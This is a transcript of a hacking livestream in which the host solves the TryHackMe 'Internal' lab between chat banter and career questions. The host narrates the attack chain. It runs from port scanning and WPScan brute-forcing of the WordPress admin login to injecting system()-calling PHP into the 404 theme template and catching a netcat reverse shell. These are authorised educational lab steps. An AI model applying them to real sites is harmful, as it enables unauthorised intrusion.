Funday Sunday.
Oh my god, my camera does not work. Shit. 1 second. I think what's happening here is Streamlabs still thinks my camera is occupied when it is not. What
are you doing, step bro?
I'm fixing it. There we go. I fixed it. Are you guys happy? Are you happy now? Step bro fixed it. All right, welcome everyone, fresh off Nahamsek's stream. How is everyone? Fingrui Muguanov Cthulhu Rilye Gognoggle Fotten. Everyone prepare your Gognoggles because we're going in today on Funday Sunday. We're going to do... God, I don't even know. We'll just probably do some TryHackMe. Let's just do some fun rooms on TryHackMe, okay? Listen, that's all I want to do today. We're going to do some fun rooms on TryHackMe, and we're going to see what dark eldritch magics we can get into, okay? Random Cyber M! How would I be molding already? I'm just trying to start my stream! What do you mean? Oh, Helen of Tor as well wants to get in on it. She's just rubbing in the fact that she has such a cute dog all the time, 24 hours a day, and then she comes into my stream and tells me to stop molding. He's been holding this. I've been holding it in the whole time. I was like, I told myself before Nahamsek's stream, no malding. Malding is not allowed. Malding is for my stream, and I have to restrain myself. I have to restrain myself, okay? How is everybody doing? How is everyone on this fine day? This fine day of Funday Sunday. I have to keep logging into my Kali VM because I just started it. A different vibe to Nahamsek's stream. It is. We keep it spicy on this stream, Gambit. We keep it nice and spicy on this stream. We keep it spicy. We keep it high energy. Because there's no reason that hacking needs to be... That hacking needs to be all stuffy and computer science-y. I'm not saying Nahamsek's streams are that way. It's just that sometimes if you watch these coding, science, and technology streams, they're really chill. And that kind of thing. But I try to pump up the energy a little bit. I try to get excited. We're excited. We're doing... Look, this is actual, honest-to-God, modern-day sorcery we're doing, okay? If you're in this chat, if you are part of the cybersecurity community, you are a modern-day sorcerer. You're doing dark magic. And you should be excited about that. You should be into it. Nahamsek, you are so generous. My goodness. My goodness. He has me on his stream, and then he gives a whole bunch of subs. Thank you so much, Nahamsek, for having me on your stream, and thank you for the new cult initiates. Daz, Quabla, Gitra, Lucky Zokt, Hennessy Dev, Maximore, and Teeman Taylor. Welcome to the All Has Red team, my friend. Thanks for supporting the stream. I like the stream. We're here.
What are you doing, step bro?
We're just getting started, Helen of Tor. There's no reason to what are you doing, step bro me. Cultists or sacrifice. I would never sacrifice my chat. Chat and I are like this, okay? Okay? We're very close. Me and chat are very close, very intimate. We have a very intimate knowledge of one another, okay? I would never, ever use you as a sacrifice unless it benefited me in literally any way. But that's just a given. Alrighty. Oh my goodness, Gar! You psychopath! You absolute madman. Gar, my friends, Gar has lost his mind, okay? Listen, real talk, Gar, listen. Bring it in. Bring it in, okay? Bring it in. We're even gonna go into the quick cut right here, okay? Gar. You need to talk to somebody about this. This isn't healthy. This is a lot of money to give to a cult leader on the internet, okay? You can't be doing this, Gar. This is a lot. This is you need somebody needs to manage your finances. You know, like Britney Spears, except actually this time and without the misogyny. Like you need. Thank you so much, Gar. That is so kind of you. Yes, that is true. That is true. This is not a cult. For legal reasons, I'm not allowed to call it that. This is a passionate club of cephalopod enthusiasts, okay? We're very passionate, and we partake in occasional rituals. I'm sorry, we don't call them rituals. Occasional activities that some might call rituals, okay? But they are not, despite the resemblance, okay? Thank you so much, Gar. That is so kind of you. It's hard to follow all of the follows and subscriptions coming in. Orbital Gun bringing Nahamsek into the cult as well. Welcome, Nahamsek. It's good to have you, of course. What else have I missed? Jay-Z bringing Headringer into the cult. Welcome to the All Has Red team. Junebug with the first time indoctrination into the cult. Welcome, my friend. Gorobot as well with the first time indoctrination. Welcome, welcome, welcome. Gar with the 4 months, as well as the 50 subs. That's so kind of you. My goodness, I hope I haven't missed anything. Again, there are so many coming in, and I'm so grateful to Nahamsek for the visibility. Oh my goodness, what are we doing today? Well, what do we do every day? We do dark magics. Okay, we're gonna do some TryHackMe today. You guys are gonna pick a box. Medium, hard, easy. It doesn't matter. Let's just pick something fun. Something fun, a good time. I'll even, you know what? I'm gonna make a real sacrifice for you today, chat. I'll even do Log4j if you want to. I know. I'll even do Log4Shell. The things I do for my chat. Truthfully. I know. Oh my god, please no. It was rough the last time we had to do Log4Shell, okay? I really do not like Log4Shell very much. People in the chat know that I do not like Log4Shell very much. What about binary exploitation? Oh god. It would be tough. It would be tough, but you know what? I'm in a charitable mood with my chat today, okay? We'll just see what we can get up to. We'll see what we can get up to, okay? Let me log in to TryHackMe, and we'll see what we can get into. I'm glad that you all enjoyed the interview. I'm really glad. Does anybody have any questions that I did not answer on the interview? What questions do you have? We're all about answering questions on this stream. What can I answer for you while we get logged into TryHackMe? And we get started. You did an amazing job, man. I'm glad you guys enjoyed it. It really, I had nothing prepared. It just came in off the cuff, and it seems to have worked out pretty well.
A hunter must hunt.
Are Infosec certifications worth the hassle? Well, excellent question. Excellent question. There are people like, and different Infosec practitioners will give you different information on this subject, okay? Like Nahamsek, for example, doesn't really care for certifications. He just skipped those entirely and went straight into the bug bounty stuff. Whatever works for you. I would say that if you're looking to get a job in certain fields, like you can't bug bounty your way into a red team position. And if you want to work for a corporation or something, you got to get through the HR department. And one way you get through the HR department is getting certifications. And the certifications will teach you stuff. They will teach you things. And they're primarily used, again, for getting through HR, though. I hear ADHD is a sign of high IQ. IQ is useless, my dude. It's a useless measure. I mean, all IQ measures is your ability to pass IQ tests. That is it. I have taken an IQ test. My parents gave me one when I was very young, and I know what the result is. I'm not going to say what it was because my IQ does not matter. Okay? If anyone starts bragging about their IQ, you should immediately discredit that person. It does not matter. It is of absolutely no relevance. So I encourage you to discard IQ as a relevant measure for someone's intelligence. I encourage you to just get rid of that entirely. The only thing that's gonna all it really measures is your ability to pass IQ tests. That is it. And the reason you can tell that is because someone's IQ will increase through their life as they learn more things. Education improves your IQ, which should not be the case. IQ is trying to measure your, the raw computational power in your brain. It's just doing it very poorly, okay? So it's useless. I'm not going to... Anyone brags about their IQ, they're trying to sell you something more than likely. As a pen tester, do you need to retest everything you find that client's infrastructure? Do you need to redo everything from start to finish after doing it the first time? If so, is that frustrating or boring? No. Sometimes the client will want you to retest because they'll remediate something, and they will ask you to go back through and verify that their remediations worked. I wouldn't say it's boring. It's just more pen testing. I just enjoy pen testing. People should stop fetishizing IQ like right now. It's a fun thing to measure. IQ tests are amusing, but basing any important hiring on IQ tests is beyond stupid. I absolutely 100% agree. I don't know any hire. By the way, I don't know any. I've never been hired for a job that asked me for what my IQ was. It's a useless measurement. It doesn't mean anything, and you should stop regarding it as a useful measure of literally anything. Your thoughts on Pnpt? I like the spirit behind it. I have not taken Pnpt. I don't know. I can't speak to the efficacy of its course, but I like the spirit that it's trying to show people what a real pen test is like as accurately as possible. It's identifying that OSCP is not necessarily close to what pen testers will encounter out in a real pen testing job, and it's trying to be that. And the people who I know who have taken it have said it's very good. And I think it's also quite cheap. It's quite inexpensive compared to other certs. But the caveat is you're not getting the value that you're not necessarily getting the resume value because it's not as well regarded in the industry as like OSCP is, at least not yet. When you're on a red team assessment, you're low and slow. Cobalt Strike beacon dies. What is your next move? Well, first of all, you don't actually know if the beacon's really dead. That's the first thing you need to realize, that beacons don't say beacon died or anything like that. They just stop checking in. And there could be any number of reasons why that's happening. Someone could have closed their laptop. We had one guy, one of our assessments, the guy who clicked on our phishing email, would just take these super long lunches in the middle of the day and just close his laptop and just go off. And this was super irritating to the people who had hacked his laptop. Do they not consider if someone's on their laptop that needs to continue to use it if he's not there? It's so inconsiderate. It's mind-boggling to me. But he would go on these really long lunches and just close his laptop, and the beacon would just stop checking in. And we were just not sure if the beacon had died or if he was just taking another one of his long lunches. You don't actually know. Why didn't you pivot then? That assessment was quite unique. We were actually stuck on the first compromised host for a really long time. We just couldn't find a vector to escalate. It took us a while to escalate to system. Once we were system, we were able to dump memory and get access to credentials that let us pivot around in the environment more. But it's not as simple as just move laterally, idiot. This was a low trust environment, and the user didn't have access to anything, so we needed to escalate to dump the rest of credentials. Can we do the TryHackMe box with a buffer overflow? I'll ask Tiberius about it. If you say no need to feel bad if you don't want to. I'd rather do something fun today. We'll see. And I don't want to, we're going to have a lot of people in chat who maybe don't necessarily understand the buffer overflow. My concern about the buffer overflow is not the fact that I don't know how to do it. I do know how to do it. But the problem is I tend to lose people. People like to see stuff that they at least halfway understand so that they can follow it. I'm not against doing a buffer overflow, but generally people don't vote for them and don't enjoy watching me do them. If I'm missing, okay, let's look at the maybe do something advanced today. Yeah, sure, we could do something advanced today. Let me just get Stream Raiders started as well. We got to get Stream Raiders started. Oh man. Apparently I had a battle up and didn't actually do it last time. That's my bad. All right, here we are. Here we are with our in TryHackMe. Let's do challenges and not walkthroughs. What do you guys want to see? Let's remove completed.
Windows anything
maybe
with AV evasion, pretty please.
Windows anything. Thank you so much, Oreo Byte. Windows anything with AV evasion. Well, I don't remember. Any one of these Windows boxes might have Windows Defender or something on it. It's hard to tell if it has Windows. If it has everyone vote for Enterprise. What was it? It was like, which one is it, Tibbs? Enterprise. This one? I'll put that one in. We're going to start a poll. We'll start a poll. Pick the box. Enterprise. Enterprise. Windows. Windows Active Directory. I'll put both of those in there in case someone wants to see Active Directory stuff today. You know what? I'll put another Active Directory one in there. Raw. Let's throw in Raw. We've done Raw before, but I don't remember exactly what was done, and people do like to see the Active Directory content. So if you do want to see Active Directory, that'll be one for you. I can't see the chat at the moment. Hang on a second. Let's look at my dashboard instead. There we go. Enterprise is hell. Oh, boy. Oh, boy. That's all right. We have no fear on this stream, chat. You on LinkedIn? I am on LinkedIn. It's easy enough to find me if you just look on my... It's easy. It is easy enough to find me on LinkedIn if you want to. If you just Google my name and LinkedIn, I think you'd probably find it. Looks like you did it already. I've done it? I don't remember this at all. I have no memory of this. I don't mind redoing boxes if chat wants to see it. If chat wants to see it, I don't mind redoing it. Let's see. Something medium or higher, I think. This seems interesting. Relevant. And we'll put in internal as well. Because it looks like I haven't done either of these, and it looks like it's a medium and hard one. I think they're probably Linux. Is this Linux? Oh, it has like lore. Oh shit, it has lore. Okay, yeah, we want to do that one then. Or we'll put that one in. All right, start poll. Get your votes in. What's lore? It means there's like a backstory for the box. All right, let's get you caught up. While you get your votes in the poll. Get your votes in. What do you guys want to see first? Again, if the box doesn't take us long enough, we will do another one. Jana struck with the first time indoctrination into the cult. Welcome to the All Has Red team, my friend. Thank you so much for supporting the stream. Jean, I hope I pronounced that correctly. Hickenroot with the 6 months re-indoctrination. Welcome back to the All Has Red team. Maticus Maximus bringing Just a Guy into the cult. Welcome. The Votras and giving 50 Tiggle biddies in 2 iterations. Thank you so much, Votras. All Has Red course when? I do kind of want to do a Udemy course. I just don't know what I would do it on yet. I haven't figured out what I'm going to do it on. I think if I got into the crypto security a little bit more, like the cryptocurrency security stuff a little bit more, like blockchain security and smart contracts and Solidity, hacking into Solidity smart contracts and stuff like that. If I get more into that, I think I could definitely do a course on that. But I'm still in the very early learning stages of it. I'm still learning. Can I get into LinkedIn? You got your nickname only. Well, I don't really post my name in here. If you want my LinkedIn, tell you what, I'll just link you to it. It's fine. Whatever. Give me a sec. It's fine. People have found me on LinkedIn many, many times. Let me just go ahead and get logged in here. Let me look at my profile. There we go. Yeah, my name is not Al. Apparently that's surprising to a lot of people that my name is not actually Al. Nor does it start with an A. That's my LinkedIn. I just posted it in chat if you want it. Looks like internal was selected. Fantastic. Let's get it going. Fire it up! Let's fire up the box. Okay, so there's lore. We have to understand the lore, okay? It's really the deep lore. You've been assigned to a client who wants a penetration test conducted on an environment.
Listen.
What? Oh my goodness, Fubinizer! Fubinizer has passed the gauntlet that is OSCP. Congratulations, Fubinizer, truthfully. I'm so sorry, Fubinizer, if you sent that and I didn't see it. I'm so sorry. There's a lot of stuff going on in chat. Chat's going really fast. And I sometimes miss things. But all Hazred Draco's in chat for Fubinizer. Well done. Well done, Fubinizer. Well done. Nice job. Alrighty. Alright, so the client requests that an engineer conducts an external web app and internal assessment of the provided virtual environment. Ooh, it's like a simulated virtual environment. We'll have to do some pivoting. Are you guys ready to pivot? Who is ready to pivot in chat?
Pivot! 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 Pivot!
Oh my goodness.
Pivot!
The client has asked that you secure 2 flags as proof of exploitation, user.txt and root.txt, no location provided. The client has provided the following scope allowances. Ensure that you modify your host's file to reflect internal.tryhackme. We will do that. Any tools or techniques are permitted. Locate and note all vulnerabilities found. Submit the flags discovered to the dashboard. Only the IT address assigned to your machine is in scope. Okay, so only the... Let's start the machine. I encourage you to approach this challenge as an actual penetration test. Consider writing a report to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearn Sincerity ECPPT or career as a penetration tester. Truer words have never been spoken. The most important aspect of any penetration test is the report. We're not going to just sit down and write a whole report on the stream. But we'll do another whole stream where we talk about the reporting. But reporting is very, very, very important. I was supposed to do the EJPT next month, but I now found out that EJPT V2 is coming out in the summer. Should I wait for V2 or do it now or both? I mean, so the EJPT, correct me if I'm wrong, is free. The course itself is free. Just the exam is not free. Am I incorrect about that? Am I incorrect in that assumption? Okay, so then you should do it now. Do the course now. Do the course now. Then do the course when it gets updated. And take the exam with the updated course. I would wait to take the exam until the course is updated. But definitely just do it now. Like, it's free. You lose nothing by doing it now. Start today. Start improving yourself today. Don't put it off. You definitely don't want to put it off. Do the training now, and then hopefully by the time you finish the training, you'll actually, you can wait to take the exam. If the exam's not being updated, then you can just take it now. Just do it now. I would just say do it now. If the exam's not being updated this summer, then just do it now and take the exam and be done with it. And then view the updated course when they update it. Maticus Maximus, bringing Fubinizer into the cult. Welcome to the All Has Red team, Fubinizer. Good to see you. This room can be completed without Metasploit. Write-ups will not be accepted for this room. Fantastic. I understand the scope. Now, scope. Let's talk briefly about scoping, okay? Scoping is of tremendous importance. It is important that there is an explicit scope, like what IP addresses you're allowed to attack and so on, and what tools you're allowed to use, and things like that. And it's very important you're conscious of that scope at all times, and that you never overstep it. The difference between a penetration test and a criminal hacking into a website or a network is that scope, okay? The scope is everything, okay? So we will be making sure that we follow the scope. We also want to make sure we add this to our... So let's go ahead. Let's make this bigger. Let me adjust my the current challenge. Okay. I can't tell if my thing is messed up. It is messed up. Why is it messed up? Why is my current challenge not showing? Okay, there it is. I don't know why it was hidden, but it is not now. There we go. Hopefully nothing else is fucked up. There we go. TryHackMe internal. We do see we have an IP address here. Let's just go ahead and just copy that to clipboard. We'll move this over here. Go ahead and get logged into Kali here. This is a Kali Linux virtual machine that I have running on my host. We'll make the font bigger so that you guys can read it easier. Tmux. Okay, so now we are in Tmux. And let's go ahead and let's start the VPN. If you're new to the stream and have never seen TryHackMe before, these are intentionally vulnerable machines put out there by other hackers as challenges for us to improve our dark magic skill. What font is that? I have no idea. I don't have the foggiest clue. I know I did play with the font a little bit. Let me see. Edit current profile. Appearance. Apparently it's Source Code Pro for Powerline. Apparently that is my font that I'm using. I did mess with the font and make it a different font, and I apparently liked this one more than the other ones. Okay. Alright, so we are ready to go. Is Kali good for hosting Minecraft servers? I mean, you could. You certainly could. There's nothing wrong with that. It's not going to be any better or worse than any other Linux server, I don't think. Alright, so we can reach the machine with a ping. And you might think that I'm just testing connectivity to the machine, which is indeed primarily what I'm doing. But as we constantly push on this stream, it is of extreme importance that we not only read our command output, but we observe what it is telling us. And in this case, what we can observe is this time to live. This time to live field is 61. What does this indicate, chat? What does a time to live of 61 indicate to us? Yeah, it means it's very likely a Linux machine. And this is because the time to live is kind of an arbitrary setting between Linux and Windows, and Solaris will set it differently, Cisco sets it differently, and different boxes will set it at different values. Linux sets it at 64. By default. You can change that, but obviously network administrators usually don't, because there's not really a purpose to it. But Windows, by default, will have the time to live set at 128. And Solaris will set it at 256, and so will Cisco devices. So, depending on what the time to live is in the pings, you can maybe extrapolate or at least guess what kind of machine you're basically dealing with. In this case, we're very likely dealing with a Linux machine. So we can verify that with an Nmap scan. Let's start with our basic Nmap scan. 196 to 11. Let's output to a file in Nmap format. We'll call the file Nmap. . All right, we're getting started with that first Nmap Scan. Let's call it Infosec's basic commands. I learned it from him, so yeah, sure. I learned these flags from him, so yeah. I'm so down for a chill Sunday stream. Dude, I'm so down for it too. I'm excited to be here, guys. I was excited to be on Nahomsek's stream. I'm excited to be here hacking for you guys. It's good times. All right, so we have port 22, TCP port 22, and TCP port 80 are open. I don't know why I highlighted those in reverse order, but both of those are open. Name a more iconic duo. I will wait. A lot of the Hack the Box and TryHackMe machines you do will have these two ports open. Super common to see this. Teach me basics. We're gonna learn basics, and we're gonna learn all kinds of shit today. All kinds of eldritch learnings await us. Okay, the old ones stretch out to us with their esoteric knowledge, and we're just reaching out and grabbing them. Okay, reaching out and grabbing that dark knowledge for ourselves. Now, keep in mind, Newbie Tuesday. I do stream on Tuesdays. We do Newbie Tuesday on that day. And Newbie Tuesday is specifically geared towards beginners. We do somewhat easier boxes that day, and I make sure to explain everything as in-depth as possible. Nmap Tech. Let's make sure we do an all-port scan. You don't want to start with an all-port scan because it's going to take a while. So you want to do a basic scan first, and then do an all-port scan to see if there are any TCP ports you missed. We are noting that this is OpenSSH 7.6p1, and this is apparently the Ubuntu version. And the Apache version is also saying it's Ubuntu. So this is very likely a Ubuntu machine that we are dealing with here. And we can figure out, with some degree of accuracy, which version of Ubuntu we're specifically dealing with. What release of Ubuntu are we specifically dealing with? If we go to Google, it looks like Burp is still configured. Let me just go ahead and... I still don't have... I just reinstalled this Kali. This is like a more or less fresh install of Kali. So I have not installed Foxy Proxy yet. Alright, so Ubuntu Launchpad. And we can look for OpenSSH 7.6p1 to see specifically what version of Ubuntu, what release of Ubuntu had this version of OpenSSH bundled with it. And we see it's likely Ubuntu Bionic, if you can see if the font isn't too small for you there. We can also check the Apache version, and we can see if that also correlates with Ubuntu Bionic. Yes, it does. So we know right off the bat, we've only launched a couple of scans against the box, we know we're likely dealing with Ubuntu's Bionic release here. And this is a game of information that we're playing. The more information that we have, the better things are going to be. The better things are going to be for us. Zero Kieran with the 7-month re-indoctrination into the cult. Zvartberg, thank you for the follow. Good night, Jana Struck. Yeah, the VOD will be up on both Twitch and YouTube once I get it uploaded. All right, so while that's running, we're going to wait for that automated recon to go in the background by... we will go to 1010, 196, 211. Okay, so we're initially concerned, but because we're unable to connect. Like, womp womp, feels bad, man. But let's recall back in the page that they actually warned us that we're going to have to modify our hosts file to put internal.tryhackme in there. So we actually expect this, and what we see is it's actually the port 80, if you can see up here in the URL bar, port 80 is actually redirecting us to port 443. This is a pretty common behavior for modern websites. Modern websites generally will not allow you to browse to them through HTTP. HTTP port will be open, but it'll just redirect you to port 443 so you can have a secure session. And yeah, as Killer2224 has called this, has said, this is what we call HSTS. Very likely the HSTS header is being set. Let's look at, you are not securely connected to this site. Let's look at, do we have a certificate to look at? Connection not encrypted, does not support encryption. It's trying to browse to HTTPS, but it's very likely doing some virtual host routing. So let's go ahead and sudo vim etc hosts. Okay, and we can put this IP address in here. Okay, that would be the Apache version. Okay, and then this was internal and internal.tryhackme. Okay, so we see that we can ping it. So the reason this is necessary, we see we still can't connect. Huh. I added it to the etc hosts file. It's still trying to browse to HTTPS, I notice. If I just put HTTP... Okay, we get the Ubuntu default page here. Let's view the page source just in case. It's always good to take a look at that page source just in case there are any HTTP comments. But this is pretty common to see. It's pretty common to see the Ubuntu default page on on websites that have not been fully set up yet. The main objective is to make the victim machine serve the internal.tryhackme file. I'm not actually sure. I don't know if there's a website at internal.tryhackme or not. If it's doing some kind of virtual host routing, you'd expect to have to put internal.tryhackme in to etc hosts and then put that and browse to that specifically. But we're not seeing that. So I'm not really sure what we're supposed to see here. We will go ahead and start GoBuster to brute force this. See if we get any more pages. We want to do internal.tryhackme. Okay, we'll see if we get any pages there. Oh, we get a slash right away. We get a slash blog, a slash WordPress. Oh, we should probably check robots.tech, shouldn't we? I always forget to check robots.txt, but you should always check that. That should be one of your first things. Nmap actually checked it for us. If you do Nmap with the TAC SC option, it automatically tries to look for robots.txt on port 80. So technically, Nmap did, before chat starts malding at me, technically we did look for robots.txt. Let's look at the blog page here. Okay, we see just another WordPress site. So WordPress is a CMS, a content management system. You see it very commonly in the real world. You see WordPress is one of the most common CMSs you're going to see out in the actual pen testing world. So there actually have been tools that have evolved specifically for WordPress. Use the API option key. Yeah, you could. I do have an API key. I just don't really care to use it for. It's usually not necessary for TryHackMe, just for TryHackMe or there's a real world. Yes, actually there is. There is a real world out there. There is grass for you to touch and everything. Shame that often WordPress itself isn't vulnerable. WordPress does have some interesting nuances to it, like user enumeration, that is almost always present. But the plugins, I've always said, if you want some CVEs under your belt, just go looking for some WordPress plugins, some obscure WordPress plugins, and just start poking at them, and I guarantee you, you will find vulnerabilities and be able to get some CVEs to your name. I guarantee it. WordPress plugins are the wild, wild west. We also see a WordPress endpoint. Is that different from the blog endpoint? Okay. Let's make sure we put HTTP at the start here. It looks like it's the same page regardless. So here's what we're gonna do. We're gonna do WP scan. Let's get rid of this. I don't want to do this just yet. URL is going to be internal.tryhackme/WordPress. So WP Scan, WordPress Scan, is a tool that is specifically for enumerating WordPress endpoints. And we're going to do that TAC E, and we're going to do vulnerable plugins and U for users. We wanted to enumerate users for us. And we gave it, the TAC T is just 50 threads. Does anybody have any questions while this is running? Does anybody have any questions so far? We haven't done a whole lot just yet. But if you have questions, you were still on the blog page. I mean, both WordPress and the blog page lead to WordPress. So I don't think it matters. Just 50 threads? That's usually fine for these. So we do see that very commonly, because of how WordPress is laid out, it's generally possible to enumerate users pretty easily. And WP Scan will do that for us. What certs you doing currently? I'm an OffSec guy, FYI. I'm not really doing any certs right now. I've mostly been working on my actual job and my content creation. My next cert that I'm planning on doing is either going to be OSEP or it's going to be the eLearn Security Pen Testing Extreme. One of the two. IRL, how many threads do you use? I just use the regular. I think the default is 10 threads. You don't want to go too crazy with the threads in real life because the client doesn't want their websites get DOSed. So don't go too crazy with the threads. Let's look at all the output that we get here. Pretty normal stuff that we're seeing here. As was already said in chat, WordPress itself is usually not vulnerable to anything significant. It's usually the plugins that you're concerned about as far as exploiting WordPress. But in this case, it doesn't look like it has any plugins. Interestingly. We do get the admin user. Okay. So while we continue to enumerate, we'll set WP Scan to go ahead and try and brute force the admin endpoint. WP Scan will try and brute force the admin with rocku.txt as a word list. While we look, you don't just want to, like, one thing that's very important as a pen tester is efficiency. Okay? It's just efficiency. You don't just kind of want to sit here watching your scans run. That's not an efficient use of your time. Usually on pen tests, you're going to have a limited amount of time to attack the target, and you need to make sure you're increasing the efficiency with which you work. You don't just want to be sitting here going, this is not a good use of your time, okay? Not a great... We want to increase, as people are pointing out in chat, it's all about this... It's all about the size of your pen testing, efficiency, and necessary investigation score. Okay? A very important acronym. Your pen testing efficiency and necessary investigation score. Very important to have a large penis. Okay? Very, very, very important. Okay? So, a part of having a large penis is being efficient in your operation. Okay? Being efficient. Did it just fucking find it? Okay, well, in this case, the password wasn't too hard to crack. Okay, apparently, in this case, we did actually get the password. We did actually crack the password, so that will make
a fine addition to my collection.
That'll make a nice, fine addition to our collection, okay? So right up, we also want to make sure that we're taking good notes. So let me get my notes open here. Very important as a pen tester that you take good notes. Do I have... Okay. So we have valid WordPress credentials here. So there we go. We're going to go ahead and write that down. What would Riley think of my two boys? I think she has quite a few opinions on the subject. All right, so to get actually logged in, the login is usually a WP admin, but Firefox keeps assuming I'm doing a Google search. Firefox keeps assuming I'm doing a Google search because this is an HTTP page. WP admin. Okay, so here's the standard WordPress login. So in the real world, I would consider it this would be a number of findings. It wouldn't just be, oh, I was able to break the password. There would be a number of findings that I would note on the report here. The most important thing I would note is the username. I would note the username enumeration from WP Scan. I would note the weak password. I would note the exposed WP admin page. This page is often hidden or restricted from just random people browsing to it. I would also note that there was no rate limiter. Like, we could just brute force this password and there was no account lockout, there was no anything. Which is usually the case for WordPress. Is it my two boys? That does sound like the beginning of a Riley Reid video. All right, the email, yeah, it's definitely... Okay, we want to note this as well. We have an email. You want to always note valid emails of the that you find on the target. This is very valuable, not only for usernames, but also for if you're going to send phishing emails later. Very, very, very important to note these emails. So we'll go ahead and write down admin@internal.tryhackme, just in case. This email is correct, sure, who cares? Would you recommend rate limiting server side? No, I'd recommend account lockout after a certain number of failed login attempts. If you have a large number of failed login attempts to a particular account, you should either lock that account or block that IP address, or both. We see that it's taking forever to log in, but it is going. It is going. And we see we get logged into WordPress. Now, what you're going to find... what you're often going to find for these, for really administrative consoles in general, if you manage to crack into an administrative console in on a web application, WordPress or anything, there's almost always going to be a way to get code execution from there. It's common to see it like in, modifying the actual page to inject malicious PHP into the page, which is probably what we're going to do. Upload a malicious plugin. You can upload malicious plugins from here. I also see it in logging functions. A lot of times, web applications will have logging options that are accessible from these pages, and a lot of times those logging options allow you to execute code on the actual target. So, yeah, there you go. Let me get caught up on subscription stuff. Night of Dark with the 6-month re-indoctrination into the cult. Welcome back to the All Has Red Team, my friend. Thanks for supporting the stream. Kiwi Fruitbird, thank you so much for those 100 Tegel biddies. It's very kind of you. My goodness, we have so many new cultists in chat today. Thank you guys so much for being here. I'm so glad to see everybody today. All right, so we do have... So the first thing we're going to try to do is we're going to go to Appearance. We're going to go to Themes. And I've seen this... I think you have to go to Theme Editor. Here we go. So WordPress allows you to modify the themes themselves, like in here. And I'll also often pick one of these, like I usually use the 404 template, like right here. And you see it has PHP code in here. WordPress is built on PHP. And we could just kind of put our own arbitrary PHP in here. like that, we can just put a couple nice little lines of PHP in there to see what's to see if we can get some code execution here. And we do see file edited successfully. So we have modified the actual code of the page. Now keep in mind, what we modified was the 404 template, 404.php. So we just want to browse to a page that doesn't exist. Oh my god. Firefox, please. I've tried to turn this off, and it still does it. Not found. We don't get the 404 page, though, which is interesting. Can I just browse directly to 404.php? No. Let's see. Recent posts. Let's just try changing one of these things here. There we go. And we see... Oops, that page can't be found. We found our way to 404.php, and you can tell... because there's Cthulhu fhtagn. Yeah, it's probably just not under the blog directory. That's fine. The way to get there is to just browse to a post and then just like tweak one of the dates or whatever to make it a post that doesn't exist. And that'll take you to 404.php right there. You see that the code that we put in here was to just echo Cthulhu fhtagn to the screen. This is going to tell me that my code is executing. Okay? I only do this so that I know for a fact that my code is executing. Which it is. We can see it right there. And then we've modified the page to accept a fhtagn parameter here. And put whatever we put into the fhtagn parameter is going to be put into the system method to be executed by the operating system. So, and I can prove that if we just add a parameter. So question mark fhtagn equals ID. Oh my god, Firefox, please. And there we go. We see we have the output of the ID command. Does anybody have any questions about that? Pretty bog standard WordPress compromise there. Pretty bog standard, but if you do have questions, I will answer them. Now we can put in code to display the contents of files and folders. Absolutely, yes. But actually, this will execute any command that I send it. This will execute any command that I send it. We don't need to put all that complicated PHP in there. We don't need to, because now we can execute operating system commands. And we can just get a reverse shell from here. Would you add to the report weak creds? Yes. And no rate limit or lockout for a user? Yes. Both of those would be in the report for sure. Alrighty. We good? I think everyone's with me. So the next thing I'm going to want to do now is I want to start Burp. This will be easier to do with Burp Suite. So let's do this. Start up Burp Suite. Let's modify my Firefox to route through Burp. I normally do this with Foxy Proxy, but I still haven't installed it on this new Kali install, because I keep forgetting. Let's do Stream Raiders really quickly. All right, if you're new to the stream, this is just a silly stream game that we play to keep things lively, keep things high energy. We just do it while stuff is running and while scans are running and stuff. If you want to play with us, !battle in the chat, and you can just log in with your Twitch credentials and play for free. Just a simple little browser game that we play. Okay, we'll turn off HTTP. Well, there we go. We got Burp listening, and I will wait until Stream Raiders is up to actually do something. All right, we're clapping these guys. We're clapping these guys. There's no way. Technique is just sitting over here, just like tossing shit. Like, they're not even... They can't even shoot up, so they can't hit technique. Easy. So easy. They need to give us some harder challenges than that, chat. Let me put a rogue down this time. And there we go. Let's get back to it. Chris B, thank you for the follow. Or Chris B, thank you for the follow. Cthulhu Fountain to you, my friend. Okay, we're in Burp. Let's go ahead and send that request again. And now we get the request in Burp. All we're looking for is the original request, which is this one. And we should get the Cthulhu fhtagn. We do, right there. So let's go ahead and send this to Repeater. And we can change request method to post. Because of the way that I wrote this PHP code, I use this $_request signifier here. And that means that the page will accept a parameter either from post or from get. This makes it a little easier to deal with bad characters. There's more bad characters in a GET request. And GET requests can only be of a certain maximum length, whereas post requests can be of infinite length, effectively. So it is easier to use post requests in many cases. And you see, we still get our code execution. So let's go ahead and use our Hack Tools browser extension. What is our IP address? 10.2.54.81, which I think was already in there. It is. We'll go ahead and copy the reverse shell. We'll have netcat listen. Paste that in. Now we do have to make sure to URL encode it. There we go. And we send it. And we do not get a callback. URL encoded. Maybe it needs /bin/bash. Nope. Still nothing. And we don't get anything here. Straight Now, thank you so much for the first time Prime indoctrination into the cult. Thank you so much. Straight Now, thank you for the follow as well. So for some reason that shell usually works, but it's not here. So let's see if netcat exists and we can try a netcat reverse shell. Yep, netcat does exist. So let's go ahead and grab a netcat reverse shell and give that a try. We're just going to try a few different reverse shells and see if one sticks for us. This is the one with which I have the most success. And there we go.
Hackerman.
I'm in. All right. So we have caught our reverse shell, and we now have arbitrary code execution on this target. Does everyone understand how I did that? I don't want to leave anyone in the lurch. Are there any questions about what just happened? Parzival, thank you for the follow. Why not just write it into the 404 PHP file? You absolutely could. You certainly could do that. That certainly is an option that's available to you. The problem is that every time someone browses to the 404, it'll give you a new reverse shell, which is a little bit loud and sloppy. So I just prefer to do it this way, personally. You're funny, bro. Nice one. Yeah, we keep it spicy on this stream. We keep it spicy. What extension is that? What do you mean, what extent? Oh, the Hack Tools browser extension? It's just called Hack Tools. If you search for it in Firefox or Chrome add-ons, you'll find it. It's called Hack Tools. I'm looking for the name, but yeah, right here, Hack Tools. It has a bunch of stuff built into it, like SQL injection cheat sheets, reverse shell cheat sheets, privilege escalation tips, and that sort of thing. So, the first thing we're going to want to do is improve our shell. We're in kind of a jerry-rigged reverse shell right now. We don't really like that. So we're going to use Python to spawn a sudo tty for us. Import pty, pty.spawn, bin bash. Okay, you notice that now we get an actual prompt. We can background the shell with Control-Z, stty raw minus echo, and then foreground the shell again. Export term equals xterm 256 color to set our terminal environment variable. And last thing we can do is stty-a rows 42, columns 142. Okay, and there we go. Now we have a fairly robust reverse shell. We have tab autocomplete, for instance. Like if I hit tab, it's going to autocomplete for me. So what are we doing now, chat? What do we do now? Keep in mind, don't say privesk, okay? Don't 